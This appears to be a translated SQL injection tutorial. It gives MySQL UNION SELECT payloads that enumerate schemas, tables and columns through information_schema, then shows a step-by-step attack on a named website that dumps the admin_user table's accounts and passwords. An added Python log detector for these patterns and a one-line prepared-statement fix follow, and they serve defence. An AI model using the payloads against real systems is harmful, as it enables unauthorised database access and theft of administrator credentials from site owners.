Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:

1. Dump the tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the fourth one.

2. Dump the columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump the passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
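
For log review, the requests above share three markers: /**/ used in place of spaces, a UNION SELECT against information_schema, and identifiers passed as 0x hex literals. The Python below is an added example, not part of the original post: it normalises a logged query string, flags those markers, and decodes the hex literals so a responder can see which schema or table was being queried. The rule names, function names and sample queries are assumptions constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule and function names are hypothetical; samples are constructed for this example.
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ used in place of spaces
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
RULES = {
    "always_false_prefix": re.compile(r"\band\s+1\s*=\s*2\b"),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
}

def normalise(query_string):
    """URL-decode, turn inline comments into spaces, collapse whitespace, lowercase."""
    text = unquote_plus(query_string)
    text = INLINE_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip().lower()

def decode_hex_literals(text):
    """Return the printable ASCII strings carried as 0x... literals."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(match.group(1))
        if all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded

def inspect(query_string):
    """Report which rules fire and what the hex literals spell out."""
    text = normalise(query_string)
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    return {"hits": hits, "decoded": decode_hex_literals(text)}

# Constructed samples: one in the shape of request 1 above, one ordinary request.
SAMPLE_QUERIES = [
    "id=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/"
    "information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574"
    "/**/limit/**/0,1/*",
    "id=13240",
]

if __name__ == "__main__":
    for query in SAMPLE_QUERIES:
        print(inspect(query))
```

On the server side, binding the id parameter as an integer in a prepared statement removes the injection point that all of these requests depend on.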